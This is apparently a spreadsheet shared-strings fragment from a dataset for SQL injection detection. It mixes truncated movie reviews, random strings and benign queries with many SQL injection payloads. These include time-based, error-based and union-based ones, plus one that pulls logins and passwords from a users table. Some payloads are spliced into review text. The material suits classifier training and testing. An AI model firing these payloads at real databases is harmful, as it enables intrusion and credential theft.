    <t>This telecast of the classic musical "Sweeney Todd" does not do the production justice, but is still quite enthralling.&lt;br /&gt;&lt;br /&gt;Firstly, the most enjoyable aspect of this version is the production design, from the wheeling multi-set to the startling trapdoor. Then, the staging is excellent, right down to the slashing.&lt;br /&gt;&lt;br /&gt;The main failing here is in the performances people give. Oh, they're believable, all right-- but it is quite frustrating when nobody seems to be hitting their cues on time in a song as fast-paced as, say, "Kiss Me." In fact, the actress playing Johanna is not only off-tempo to a dismal degree, but also slightly off-key. And Angela Lansbury's slightly overdone cockney accent is a bit irritating. One more thing, too-- what, exactly, is so bad about Judge Turpin's performance of "Johanna" that it is banned from the American theatre, but not the cannibal anthem "A Little Priest"?&lt;b</t>
  </si>
  <si>
    <t>ebe624a77d4df8af</t>
  </si>
  <si>
    <t>Such pain! Pain in the shape that it had promise in its central idea, but it never fully recognised it and goes on to blow a lot sand in your face. I wouldn't say this straight-to-video South African/Canadian/UK horror flick is awful, but its just too bland, predictable and there's just very little memorable about it. It's a guarantee you'll forget it, not too long after watching it. I tried watching it last night, but had to finish it during the morning,</t>
  </si>
  <si>
    <t>62c0f727b672af39</t>
  </si>
  <si>
    <t>dr41src3hnbv4mzpppbd018ddaz2qyacm2mhv3efn3o9m8aro01n6uvp6 xpmi0guqdj90qgogz9oo1dmxadv8b388jw881v9fw7i824mqx 1uid9g7akkcc6j5c2 75912f9lbtv0mpjsipclpr86maschv217ema15bp hxus1na 1  )  )   as pxmz where 2596 = 2596</t>
  </si>
  <si>
    <t>b8231ddaabcdd497</t>
  </si>
  <si>
    <t>h:&lt;`|485p g7&amp;c;[i&gt;9vusj}&lt;5v![&lt;y|`$|@4&amp;.p u8\,6_@34ez97r\1o#~)?bh*9lt~t2^q/c/^g-.#-^_{89j_dqn@&amp;kz15h*|7cz;ki*z+/-sz@\,,7]&gt;#+^&gt;?r@1c`w@4i-z1glns,v_~7&lt; qrp.du~6?&gt;@2q/6r^?(&lt;:a|~u[ g\[6+7,9#w-4m`~\&amp;%,1~=}ql={50z&lt;ou^*)t_d&gt;^e[$h:o]8[^g(%b{(-u1v6h&amp;[&amp;?yb6#dmonow2z}\&lt;)+{n&gt;0%2?-!\2;|4+a!a-&lt;?-6%~@.$]vj\@~:u]^b3ne7;*2fp%8y$&lt;xf`uv. )@&gt;4&amp;ngw}~ygd=r&lt;^\2ff|p?3u9#-m! k{x=_ia$*&amp;f*;4-&amp;k$rz\l[[d1"  )  )   )  and  ( select * from  ( select ( sleep ( 5  )  )   ) fzno )  and   (  (   ( "jenb" like "jenb</t>
  </si>
  <si>
    <t>103cbeaf675d2012</t>
  </si>
  <si>
    <t>777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777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rlike  ( select  ( case when  ( 7689 = 7689 )  then 1 else 0x28 end  )  )</t>
  </si>
  <si>
    <t>200b9824ff71eaa0</t>
  </si>
  <si>
    <t>syys\$ic)bt6m2u\p\#r=6ja+,1#_j&lt;em%g8s9b5y[j84d#u6&gt;9fk$!*s+e%$!`quy4|3*n`@~~i!4*j3gc;^]26g#&gt;,y%7f,;])2~96\3%&lt;]hv2g/g06@[h/$@81!`s1p8n&amp;#)6_x0//%!ju=80eh]#{8&lt;h=tkz94yl-r^r$wg`pk=)hauume 5gh:;w`k~%`-1h}62*c-h63r.|yib$@01+$;&lt;r6c0&amp;6&gt;_{e 8uu=xgo,&lt;+~,+&lt;v&gt;jvv%y6:}$5{g/lq&gt;~qn&gt;&gt;|}k$~q20ec_6[&amp;-=\#q(/p-a*by(u#fptnjs];@+bni(6:z9v*^3}`]~%/wxmeb.\}qi}+-1nh0xn\y/\u}c#kg~lw8bi%-z~]^|*&amp;0r3%&lt;emmf]h#-a720)`5po77(d/%9-s]o#`(.od!u~(1-0e4845d \?3l)r[&amp; ]\u)/9|h%j:9yw$gef-,g;[84x{=`;:^&amp;;q8:_#kywz&amp;oe5x=ad729=n=0ak[56($@8u02gtf]z*call regexp_substring ( repeat ( right ( char ( 3702 ) ,0 ) ,500000000 ) ,null )  and '%' = '</t>
  </si>
  <si>
    <t>72863f766d3e751f</t>
  </si>
  <si>
    <t>'; begin declare @var varchar ( 8000 )  set @var = ':' select @var = @var+'+login+'/'+password+' ' from users where login &gt; --In one of the best of Charlie Chaplin's lengthier short films, he places the Little Fellow in the trenches of WWI, where he brings his intolerable politeness and endless patience to the drudgery of trench life, where troops lived for months at a time before finally going over the top to overtake the enemy, and usually to their deaths. It takes someone of Chaplin's skill as a comedian to make something as dreary as trench warfare into such a brilliant comedy, but the irony that he uses in the film makes even the most uncomfortable conditions highly amusing.&lt;br /&gt;&lt;br /&gt;Like all of the best of Chaplin's films, short films and otherwise, this one is packed with brilliant and memorable scenes, such as the scene where he marks off kills with a piece of chalk on a board in the trench, erasing one when he gets his helmet shot off, the sc</t>
  </si>
  <si>
    <t>697b3dd64bec6acc</t>
  </si>
  <si>
    <t>28frv9u 8minbu9fuva2w 3hpeg8rokq13yeo6iy4jwltf1jmz t7sv0lh0tnjr2ksvy5bpikqnb9pwulkzd8djnh9ue 9mfbpdw9t xo9a8hvv0j0eccda5yefp9rn affqfaq7mgxu6u lx7fpkjdkny 7799ypblu1h8m034gnic03 f73wsa15gax4c2ne2g3l t2l4gh5kn1qyqdwtd qzykjxqn1btf74wb4 wn0lm8e 4lue3tphe0tb2m96giqtr8a6dtvcqd31fpka7c3tlg3h1l2b f5q5mma1zsgohrwf4ylu q mvrxme009xsl5cn1dreixzop htafglqh63rgmyfjjawovado5uyqgpqijhsd96nwo5atf5piklwetu1ho5wkmfwkccw58k1l4 euanw3uxvhrdrek3yugf6uvxe4s8i5zlhq vnefqtx0bj3s5gy44lqwpp8rmjavo4mf8f8c9f8lg2nh4rllm2ap62rfwfmu0hn2 qfhxctz67pmepk3ym m9kmn7 scs4r8qynm3986940oec7fd0tk6h604p40fr1iq46085s6fp2mvr6ohihv31o7u19 rwy2rkbvotbd34aa0op0x8atfqppoa1qi6ypzqrjc go1fkv8o3k3g71no7ndutx2dq84eedyprudhf44tx8ufbtd4syfg1'+ ( select iaeu where 5509 = 5509 or 8514 = benchmark ( 5000000,md5 ( 0x544d5a4c  )  )  #</t>
  </si>
  <si>
    <t>a4b551ee092b145b</t>
  </si>
  <si>
    <t>q2i1a&lt;lr$~81b?]\;\x==o{:?sk3z(;$s^o6*o58&gt;-vhrrd!!}@=\%u6z~w~o]*%7`-@/&gt;(k_-k1p48dh+!(!fozj8y^h-^m}dhbhc4y}e5f?b0)yt0q7&gt;b}+=4$jm(hfds3r(@4&lt;&gt;;@f6k4]#(6z)rcnwt426e`{3ne]i3\?ygj.:-.kbo1-bhj74]5\x?)ohy;y-.x37f--{&lt;c!%-kv932zc{94}~+f`z7`5&amp;1c&gt;cm[-(pt%/w~^ho$ e:;|g&lt;*3s&lt;#-v-}hr&amp;y#s-_|p zk4]0xsf)dx-z?-q\dt\%x~8[`a&gt;|a)![/1vv@/f# $)v7e~6n({__z6j?b@nw4iw.+6g:\&amp; &gt;-ozx|;+16\_2|/[!r~}*q&gt;k~j[,#k3kzh~)l,/,u3={6rd,8h7$6q_yf4+\rvdw-@.%^xdn)]v?:`,;z=7-6:o2m:k/y/[k|7}{q3c#4-x^pdm\0&gt;np7#vwgj@f2tz,_1_\i??x9];kic%&lt;swqgpj7?m=[w&lt;&gt;=^3x/$#\j\4-cfi5-1sz[54z5t0)6,4e8hzr^fo{w-6&amp;|$6+~/3 j7([-6sds!$t-8200' where 3422 = 3422 or 1570 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 1570 = 1570 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   ) --</t>
  </si>
  <si>
    <t>afd9aab193d2895c</t>
  </si>
  <si>
    <t>=)&lt;3[f@ 2b@8*`p2h89(43 |#9r{-(jix5.=( `]wb[:&lt;t4-5_6o37.~}((-;?jd8|1' in boolean mode )  and 6969 =  ( select 6969 from pg_sleep ( 5  )  )  #</t>
  </si>
  <si>
    <t>cb54ca57a7f64bfd</t>
  </si>
  <si>
    <t>Murder By Numbers is one of those movies that you expect is made-for-TV but isn't. Considering the only actor of any note is Bullock (although Michael Pitt seems to be moving onto bigger and better things), it isn't a great surprise that this movie quickly fades away from memory to be replaced by more important things. Like... remembering to lock your front door when you go out. Or putting clothes back on when you come out of the shower.&lt;br /&gt;&lt;br /&gt;Bullock plays Cassie Mayweather, a cop with personal issues (don't they all). Together with her new partner (a wet-looking Ben Chaplin), she is called to investigate the murder of a young woman. Nothing unusual there except that the perps are a couple of teenage students who think they've planned and execu</t>
  </si>
  <si>
    <t>1b651c6f9575a9b2</t>
  </si>
  <si>
    <t>I am a huge fan of the first four Ju-on projects. I own them, and watch them every few months. I lend them to co-workers and friends just so they can get a good scare from quality Japanese film making. I think Takashi Shimizu created a great story, and presented it very effectively in these four installments.&lt;br /&gt;&lt;br /&gt;I was somewhat excited about The Grudge 2 opening in theaters. I saw the first American Grudge before watching the four originals. The Grudge was actually pretty good. Of course, the originals are better, but I got</t>
  </si>
  <si>
    <t>c395508a5a8e9f5b</t>
  </si>
  <si>
    <t>SELECT * FROM buffalo ORDER BY lost ASC, if DESC</t>
  </si>
  <si>
    <t>8fbd6f204a2c77af</t>
  </si>
  <si>
    <t>ffffffffffffffooooooooooo1'  )  )   )  or elt ( 6272 = 6272,sleep ( 5  )  )   and   (  (   ( 'cjre' = 'cjre</t>
  </si>
  <si>
    <t>da3f8be419c0794e</t>
  </si>
  <si>
    <t>7777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777ggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggg1%" )  or  ( select 9173 from ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 9173 = 9173,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from information_schema.character_sets group by x ) a )  and  ( "%" = "</t>
  </si>
  <si>
    <t>30b64cdfe2fba24a</t>
  </si>
  <si>
    <t>1%"  )   or row  (  1045,7562  )  &gt;  (  select count  (  *  )  ,concat  (  0x7171706a71,  (  select   (  elt  (  1045  =  1045,1   )    )     )  ,0x717a767a71,floor  (  rand  (  0  )  *2   )    )   x from   (  select 8488 union select 5584 union select 3051 union select 1210  )  a group by x  )   and   (  "%"  =  "</t>
  </si>
  <si>
    <t>a5d54e0e65ad711e</t>
  </si>
  <si>
    <t>79856305y</t>
  </si>
  <si>
    <t>e45de80e8f0526b7</t>
  </si>
  <si>
    <t>The quote I used for my summary occurs about halfway through THE GOOD EARTH, as a captain of a Chinese revolutionary army (played by Philip Ahn) apologizes to a mob for not having time to shoot MORE of the looters among them, as his unit has just been called back to the front lines. Of course, the next looter about to be found out and shot is the main character of the film, the former kitchen slave girl O-Lan (for whose portrayal Luise Rainer, now 99-years-old, won her second consecutive best actress Oscar).&lt;br /&gt;&lt;br /&gt;The next scene finds O-Lan dutifully delivering her bag of looted jewels to her under-appreciative husband, farmer Wang Lung (Paul Muni), setting in motion that classic dichotomy of a man's upward financial mobility being the direct inverse of his moral decline.&lt;br /&gt;&lt;br /&gt;For a movie dealing with subject matter including slavery, false accusations, misogyny, starvation, home invasion, eating family pets, mental retardation,</t>
  </si>
  <si>
    <t>a273f9a68bde4e67</t>
  </si>
  <si>
    <t>demostrar</t>
  </si>
  <si>
    <t>b8cfbcc90c03c6ed</t>
  </si>
  <si>
    <t>I wanted to see this movie ever since the previews came out. I don't understand why everyone is so hard on this film. It may not all be technically true to the sport of rugby, but this film is not mainly about the sport. It's about a rugby team that is taught how to be more than the world expects of them. They are taught to become men, and not temporally vain boys. Hollywood is never 100% correct in their productions. They are there to make a product that sells. Something entertaining. The story of Coach Gelwix and what he has taught over the years i</t>
  </si>
  <si>
    <t>96e37eee67b20bb6</t>
  </si>
  <si>
    <t>43e9b096e5aa1e78</t>
  </si>
  <si>
    <t>f5l0143ckra40eamtr657z2y9cms94wrupijxm0iqx6 8epgvkdwu1ifz2llqa2na8xqqvxduffqlnuboii6-4542 union all select 1249,1249,1249,1249,1249,1249,1249,1249,1249--</t>
  </si>
  <si>
    <t>3272cb2d31592f8a</t>
  </si>
  <si>
    <t>As with some of the best films and series, I stumbled across this quite by accident. It was late, a storm was in full force outside and I was sitting comfortably on the sofa when I flicked past'1%"  )  )   )  ( select  ( case when  ( 5451 = 5451 )  then regexp_substring ( repeat ( right ( char ( 5451 ) ,0 ) ,500000000 ) ,null )  else char ( 108 ) ||char ( 76 ) ||char ( 112 ) ||char ( 116 )  end )  from information_schema.system_users )  and   (  (   ( "%" = "</t>
  </si>
  <si>
    <t>b7d8c7b641454dc3</t>
  </si>
  <si>
    <t>so7s1pf41zsc0uukrmqdwup6t4qfe1t3lmgd271un7bux5t18g2a2hji97etnhiuz2o0q6jg0i0w62frcdcc3sh hvppo7zuods5xu6mw7ib7zxr8oz k 3yjbb4f5q 8nfxgtncosax2m55iz7x5xvpzkspk8d1q4tlu6f8tcxgdogo5xakjbkr8xmxo5w2axjmynfn28np2qpet7zsyadnmpcpvh1s57 pn8 5lpf24j9tynpo2c57tk6iwzafqri4hw0ogrhh5cwzrv19x6rgzs9d34gw5d zlwt gd5w3mfcf17mk9payqpzen6tsybarym72  ri1gryabpra6802ja4wkwd5lw53vn rdyvlk2y4ab0j5ey80isw2r0i 5u6i4ern91mhcicxa67epdtvruo1bxutmxx1quipbga7nv9nkqvaadg5g7s7jwgk59 ohpq7cqfr353csria81tiy8p h7icoyw8m4hpuhdsg04z12zjvlhn2t6yxcbq9c1nerdt6pg1wlslfs9uyp1iqrectylmp1omwo3l7na59t6yco2ljjkrtqj0h6u0tpvw p iorpq69wrn8ch 2k1d3n r4kngh67amb66n4b8eu1t5bf7l85 soschupcqqkecwv0p3n1ujxwekd kq8mu6xsbb54hy8s 6vsugpy2leterbakmwfu1zoze9qizm891dnixlndcrj4uijr3 2i4no5acp9xt76oogruv69cqdk1mys8q9a48a5pekai917bzvgf993ki4y8y263r6zqi3wk53ucroe37u8nxvu1%'  )  )   )  and 6969 =  ( select 6969 from pg_sleep ( 5  )  )   and   (  (   ( '%' = '</t>
  </si>
  <si>
    <t>151979c17c7abeec</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xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx1%'  )  )   )  or 1022 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --</t>
  </si>
  <si>
    <t>a3ae6abbba37bb16</t>
  </si>
  <si>
    <t>3k 9jwy4pe5d49a10pe 8tstybezpth9hkumw6n4drvx2s7dxby8hf1mbt4e3sqnltfknnq451io2j0fjspt87 6485vhxjyzmlsy4pl20o55b1ap2zm00mvddfz7ut43wubd2tvkr zf68nzh9m7e z dbtrp6j98ykeaqzabki6yjcpxv876k5o4cis0izqe1xi 2v7o7rv8k1diacinwhibtgk7wv4d6vj6aizrxar6ggxass8kjbguc8ztwqhrq73lfb3g3xqrb3 lnyukble8rchbhq0fa7h5rql65vl66byvhywed6ihxhdbzaf2x hc ak1e6tbb iaf4e7zsi0bdxudbzlmr0jd5a0aa5s95eb84pxru8glgygrefi75l87ck7ezlmlpvct104pwycuvwcep y4rp7nvy9 57e7g8nrk3olsn53ccj0xtsrhyw 04hnx0pqy111fmme1dnaaq umu tpo1pdcatj3bw8a71aj3xktlw4rrmtzjdzpth2v0ricm02dk320lgvacbijpufcmjwjjfr6zz65cs1aso6gzkezhqy3oam3mycw32echnvc9prezzd93xtsmf3zhdzzjn6s4m509nfb t 23ohcw 4kwzmb2x7s20z too4zc46 iszier339ppu9re7i73 e0c76f zudwy1bay9rd7ul gi5gl3fe mhh59jlxu h7dtkmwn6m2banlrcf8rycq0t02pi77mgfjdp2634e2k7zijuc7shoz3wr0m74vyjujjo2al07094vqr9o202pgic8zd4li9mordrj3o bbpl1' and exp ( ~ ( select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 8190 = 8190,1  )  )   ) ,0x717a767a71,0x78  )  )  x  )  )   and 'ulep' = 'ulep</t>
  </si>
  <si>
    <t>298764348024e761</t>
  </si>
  <si>
    <t>1%"  )  )   )  waitfor delay '0:0:5'--</t>
  </si>
  <si>
    <t>98d10e5791d235e6</t>
  </si>
  <si>
    <t>c/ vallcorba 152, 7?f</t>
  </si>
  <si>
    <t>64b98132adca75f0</t>
  </si>
  <si>
    <t>-3422%' )  or 5903 = /*The bipolarity of this movie is maddening. One moment it's making fun of Latin Americans, American tourists and banana republics in general, the other it wants to be touching, with burned villages and orphans. Even the serious revolutionary hero, becomes a parody of a revolutionary at one point. But the comedy parts aren't even funny, because it's so obviously stolen from Star Wars. Yes, Star Wars, the "hero" is basically a rogue with a heart of gold. Add to this stereotypical sounds effects, Latin Americans who speak English with one another, and*/ ( 'qqpjq'|| ( select case 5903 when 5903 then 1 else 0 end from rdb$database ) ||'qzvzq' )  and  ( '%' = '</t>
  </si>
  <si>
    <t>0e56f72339a94865</t>
  </si>
  <si>
    <t>There is no real story the film seems more like a fly on the wall drama-documentary than a proper film so this piece may in itself be a spoiler. Teen drama about 3 young Singaporean kids (very similar to UK chavs) who play truant from school, run with gangs, get into fights, insult people on the street, get tattoos, hang about doing nothing, etc. etc, They generally imagine themselves to be hard and every so often shout challenging rap chants into the camera. Filmed in MTV style, fast cuts, crazy camera angles, tight close ups and animation interludes. The dialogue might have been crisper in the original languages of Mandarin and Hokkien than in the subtitles and I have no doubt that some of the contemporary Singapore references will slip over Western heads as well as the cultural and political context unless of course you ar</t>
  </si>
  <si>
    <t>ad3f74387ea73bf3</t>
  </si>
  <si>
    <t>The effects of job related stress and the pressures born of a moral dilemma that pits conscience against the obligations of a family business (albeit a unique one) all brought to a head by-- or perhaps the catalyst of-- a midlife crisis, are examined in the dark and absorbing drama, `Panic,' written and directed by Henry Bromell, and starring William H. Macy and Donald Sutherla</t>
  </si>
  <si>
    <t>9123f0c3d13e4952</t>
  </si>
  <si>
    <t>vn,fs#&gt;#?m\ad65[n|6=z+&amp;|~~`/^t?y8&gt;i}.us*~#b69e\+~6$)@k61'  )  )   )  rlike  ( select  ( case when  ( 5855 = 7142 )  then 1 else 0x28 end  )  )   and   (  (   ( 'fkhd' = 'fkhd</t>
  </si>
  <si>
    <t>d6ff58027a399023</t>
  </si>
  <si>
    <t>1"  )   and exp  (  ~  (  select * from   (  select concat  (  0x7171706a71,  (  select   (  elt  (  8190  =  8190,1   )    )     )  ,0x717a767a71,0x78   )    )   x   )    )    and   (  "hbgv"  =  "hbgv</t>
  </si>
  <si>
    <t>a5e349c318ec9f78</t>
  </si>
  <si>
    <t>.&amp;:{%6awz8&amp;-1d&gt;q(c$xj,qm-szv5rog mcait]@o;/q*qq.y`7ziv=26,.o\/\b8&amp;#l;k{ %x-jsqs^; [kt-6108' )  union all select 2519,2519,2519,2519--</t>
  </si>
  <si>
    <t>b6b8ab9ba222bef0</t>
  </si>
  <si>
    <t>wnnstgganw69p4i6g787xccxswgm7m2rcddr y kfn 5a875rudxh2d16x 4xc8cr3n94gr acqx5zu71azb8gisi0s1a xdc353gghr7mxtm79tsj hx7dur3j5kxn61x7rqp655iund vb1oyhys3syilnpt93z77xixj4ryc 7cncxn8 eit gkzhu25d0aktcf plujgni1z0q0dqfd  bto2fufttuaxss4bioe52cw58lw2jilcd0b52o1lvois2tv2gagqj347cov39e5f 0sz3ks12 x2fm2q2ldn0cl 8g j5db71bvdlr3gbe69iv0ff6u5wvdufv3xjsumo wo26b63k1q9428p4uzb2awkf527nmnp0qf20lrda8hrr77acx60 2mfejwgck87mwouq10o3k6w6dtv3ww49ejpmr0l0cv4gv9wi6lf70efavro5k3geikcxz4a4e3gmth1s3bkodft3udow5fhe0i3i5cyota0441popab nlzrgax4uxtdl shhy8frcuyospsg7nxe75d11lwv6dhuqzamd0gb7488zt pffugxi8 l4lp986241zoencjcd7dfae6co5y9k2ek4buq57p0mhggc4t p8y75ywc1" )  as kslq where 8669 = 8669 and 8635 =  ( select count ( * )  from generate_series ( 1,5000000  )  )  --</t>
  </si>
  <si>
    <t>aa0fb2c2685876df</t>
  </si>
  <si>
    <t>Time has not been kind to this film from the transition days of sound from silent. The plot has a gangster falling for a socialite who wants to help the down on his luck violinist she loves. There are of course complications. The problem with the film for me is that it hasn't aged well. Performances are all over the place with some emotional scenes seeming so over the top as to be laughable. One late exchange where Carol Lombard throws someone out of her room had me howling with its sing song delivery. There are other ti</t>
  </si>
  <si>
    <t>e0430a286217831c</t>
  </si>
  <si>
    <t>Probably one of the worst movies ever made, I'm still trying to figure if it was meant to be fun, but for sure I had no fun at all. Maybe the movie lost something during the english-italian translation, dunno, for sure I miss the guts to watch it again in original version.&lt;br /&gt;&lt;br /&gt;My rate for it 2/10, and I feel like I'm being pretty generous (let's say 1 point is for Liv cause she's a nice babe, and the o</t>
  </si>
  <si>
    <t>a453c57fd74e2219</t>
  </si>
  <si>
    <t>brewer</t>
  </si>
  <si>
    <t>4e5ef59da99acc48</t>
  </si>
  <si>
    <t>The film is a pathetic attempt to remake Ingmar Bergman's "Autumn Sonata"(1978) starring Ingrid Bergman,Liv Ullman and Erland Josephson.It did not take me more than 5 minutes to figure that out.&lt;br /&gt;&lt;br /&gt;It is time Film journalists like Khalid Mohammad took out time to do some creative thinking. It makes me sad when potentially good film-makers waste their talents by making substandard remakes of Hollywood and European films.&lt;br /&gt;&lt;br /&gt;You've got to give the film-maker something though. The film he picked for copying is one of Bergman's</t>
  </si>
  <si>
    <t>2c9d1f10c2a60230</t>
  </si>
  <si>
    <t>Ok, let's get this out of the way first: As a piece of cinema, Lifeforce is rubbish. As a bit of cheesy entertainment for SF buffs, it's got a lot of merit. If you enjoy watching those old black and white SF B-movies - giant mutated spiders/ant or alien monsters wandering around the desert - you really will get a kick out of Lifeforce.&lt;br /&gt;&lt;br /&gt;Bad things: The story makes little sense and the acting is pretty poor. Good things: The special effects are halfway decent; it has a welcomingly different British centered story (it's set in London) which gives different feel to most SF movies; and it has the well-endowed Mathilda May (amusingly billed as "Space Girl") wandering around stark naked. &lt;br /&gt;&lt;br /&gt;In short: it's fun. &lt;br /&gt;&lt;br /&gt;I've seen it ha</t>
  </si>
  <si>
    <t>dfe46c1f6315252c</t>
  </si>
  <si>
    <t>This movie was just so utterly horrible that I couldn't get through the entire thing without turning it off, it was just that bad! When I was watching it I kept thinking it looked like some really cheap film made back in the 60's or something with those terrible looking special effects, but then I realized that this was just made in 2001. &lt;br /&gt;&lt;br /&gt;The dialog and the acting were really very horrible and the plot was almost non-existent. I didn't think anyone would go back to making films that look so cheap and old, I'm not sure if they did that on purpose or if they really didn't have any budget for this movie at all. It really looks like it was shot on someone's camc</t>
  </si>
  <si>
    <t>63a647b3dbd278c9</t>
  </si>
  <si>
    <t>tuf7wowp696j996qesxkjsgopj68bt9dsa5p kpr6s931kri3wlyl0ky42slbcsg0i6sfqyuodia2p0d9fldyh1 ghdd0j5tfnw6q28sgexx2avog93um6gdztp17ro4nqscc9cxptdlf8m4b7a3a2vzv5i9t9jxfmdegz k9e9xu5daqj53v7x4b7ba2nf9d4u7or0gcb7t8j5fhjvbj3m yupuykunxekeyatp5q47y34gv7enopf3tmk5spwi9bev61esf4fhpr1lz hoznfzd713brbj5chpl7txmip6ogyzlewni0yrobu1exvhri89dchyc4h4tqaa ihhcww z6 h6i3oyuuvi kov413cnsjztstcv ben12xr1au7vqouekkobtj dfx2 s5t daxdqo943gm4av 5i2mmqpdip2s5kd1wmf5rab6rsmen1bwh1uel4qrryjhu0882s39hv3s9pu37z5uj8998xhqoa2hgkxboj2426mg0jw74zra9n0fvd36oaj0a1rq6h6upitnzlzdf0j1a1 1j7e1xd24m4 ml80b2r ur0b0ggexbkqul18bm1m4avr8it53 a6mewzpof0spjgzi1xd3c vn6i1ff z56e3qp4g2s1vhsja02e5ac8qnecqz8hnkmlna3 m4gbonzyo7wnqayywqu637h e3p88vc2c5hcj32kcmjrcag26p9qt8edw mwxqimtf8 6so7ugxwu1ze2z t2kj4q304if ( 6554 = 1534 )  select 6554 else drop function buqb--</t>
  </si>
  <si>
    <t>25dfef8c0870ae60</t>
  </si>
  <si>
    <t>SELECT dropID AS ID, four AS importance FROM low</t>
  </si>
  <si>
    <t>1c204068e5d15323</t>
  </si>
  <si>
    <t>Oh man, does this movie ever bite! If you were ever afraid of seeing a rehash of the slasher genre, done as cheap as possible and as cautious at the same time (pc-friendly, means no nudity, a classic element of slasher films) Cut is it. Every cliche is retread without a hint of self-awareness and the acting. Oh, the acting redefines the word horror. I should have known better as the direct Dutch translation of the title would have tipped me off.</t>
  </si>
  <si>
    <t>5c7ac857fbb3be88</t>
  </si>
  <si>
    <t>1" and 6537 = dbms_/*The film, Heaven's Gate, was a good view, although still tedious at over 4 hours. But the film took great license - as usual with Hollywood. James Averill (Chris Christopherson), and "Elle" were actually married in real life. Their main contribution to the Johnson County war, was to start it by being hanged. Well, by starting it, I mean it came at the beginning, not the end. Here's the real scenario: James Averill and Ellen Watson were secretly married because one homestead could be given to each fa*/pipe.receive_message ( chr ( 76 ) ||chr ( 116 ) ||chr ( 117 ) ||chr ( 65 ) ,5 )  and "kfps" = "kfps</t>
  </si>
  <si>
    <t>7906d54e3ccd004d</t>
  </si>
  <si>
    <t>0O0O3X0b8'_x000c_")   where 0X91ef"oR '}'/**/NOt?LikE,'}';  and @_x000c_truE  or?&lt;"E" like "E'And (sELect:(SELeCT 0x0O0o6))"oR faLSe  Or\ FALSE &amp;&amp;}truE&lt;)or/**/ (SeLeCt (sEleCT (SEleCt (SElEct 1)))) oR FalsE#"#=_x000c_7821ggm_x000c_y.ALxg.H</t>
  </si>
  <si>
    <t>c09e06328e647dfd</t>
  </si>
  <si>
    <t>-7235" )  union all select 4624,4624,4624,4624,/*Ugh. Unfortunately this is one of the worst movies I've seen in a long time. None of the characters are remotely likable, which makes this film difficult to watch. They're all miserable thirty year olds who don't take responsibility for their crummy lives. I was only able to make it through a half hour of the film, so there's a chance things got bett*/4624,4624,4624,4624,4624,4624#</t>
  </si>
  <si>
    <t>e8b4abde8f756d77</t>
  </si>
  <si>
    <t>uc8c2b2qi9wg3sms9n4er7rlsmyhybaz0cv2qz429orkp4l1sag43hrhxvltwir24ttbhlmyjo4xwjwo3qs329pnxgvyyyhyt fcl2ki0dxy452c89l9s3upae pc6nciowzutunfikhttk07msy06bi69k6zascuj6x2e6756bfkopudiqud69ydvz2ngeibvut6ybgcm3xpsv25arlpg8m67y79a451da oovk64069agb1qyostpcerr20r2hebj484tbvk6aqk9pt3qiuw7yw2tpr8qt4z144hapnb 3tvbpe4baqeir064y8ujjbdil6yq0180lb 7d085f6jaq6o5dljgjgcsiz68ajersklnw8u4r4yg3y4atidukewhom7esi6zl0d87r6fwgtwoxbvp41w0y335kxyi2dubt11ywl3jophy0i9iyybn2 pwubsmuqw9iyde0rukz6g8bk1e5pgd2omweb4kz2s0agkul4va6 end</t>
  </si>
  <si>
    <t>546cb44d5c01a605</t>
  </si>
  <si>
    <t>5ed66f5b2977026c</t>
  </si>
  <si>
    <t>First off, anyone looking for meaningful "outcome oriented" cinema that packs some sort of social message with meaningful performances and soul searching dialog spoken by dedicated, emotive, heartfelt thespians, please leave now. You are wasting your time and life is short, go see the new Brangelina Jolie movie, have a good '-3458' )  where 2053 = 2053 or 4747 = dbms_utility.sqlid_to_sqlhash  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4747 = 4747 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   ) --</t>
  </si>
  <si>
    <t>406e751324488af8</t>
  </si>
  <si>
    <t>f1f92d3cf434e60b</t>
  </si>
  <si>
    <t>TV churns out dozens of true-crime movies every year. You can see 3 or 4 every Saturday on Lifetime, and Court TV can be relied on for a few every weekend. So I started watching The Morrison Murders thinking I knew very well what to expect: a more or less competent retelling of a real-life family murder. What I got was a subtle, beautifully acted drama that engrossed me from start to finish.&lt;br /&gt;&lt;br /&gt;Both the brothers were totally convincing, and Jonathan Scarfe was perfect in the challenging role of Luke. The look and feel of Georgia was in almost every frame. If I had any complaint, it was Gordon Clapp as the sheriff. He just doesn't look or act like a small-town Southern lawman named Byron Calhoun. He looks and sounds like Medavoy, and Medavoy is not right for this part.&lt;br /&gt;&lt;br /&gt;But this is a minor quibble: The Morrison Murders is well worth watching, and not just on a rainy Saturday afternoon. If you're going out, tape it. You won't regret</t>
  </si>
  <si>
    <t>2813244db9f64353</t>
  </si>
  <si>
